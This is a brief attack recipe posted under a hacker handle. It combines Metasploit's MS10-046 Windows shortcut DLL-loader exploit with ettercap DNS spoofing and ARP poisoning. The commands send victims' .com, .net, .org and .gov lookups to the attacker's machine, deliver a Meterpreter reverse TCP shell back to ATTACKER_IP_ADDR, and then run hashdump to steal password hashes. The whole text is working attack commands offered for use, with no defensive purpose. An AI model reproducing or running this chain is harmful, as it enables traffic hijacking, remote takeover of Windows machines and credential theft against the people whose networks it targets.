-+Metasploit MS10-046 + ettercap dns_spoof goodness+- by __ __ /'__`\ /\ \ __ /\_\L\ \\ \ \/`\ /'_ `\/_/_\_<_\ \ , < /\ \L\ \/\ \L\ \\ \ \ \`\ \ \____ \ \____/ \ \_\ \_\ \/___L\ \/___/ \/_/\/_/ /\____/ \_/__/ http://disillusion.us MSF: use windows/browser/ms10_046_shortcut_icon_dllloader set SRVHOST ATTACKER_IP_ADDR set PAYLOAD windows/meterpreter/reverse_tcp set LHOST ATTACKER_IP_ADDR exploit ettercap: cat /usr/share/ettercap/etter.dns *.com A 192.168.217.133 *.net A 192.168.217.133 *.org A 192.168.217.133 *.gov A 192.168.217.133 ettercap -T -q -i eth0 -P dns_spoof // // MSF post exploitation: sessions -i 1 use priv hashdump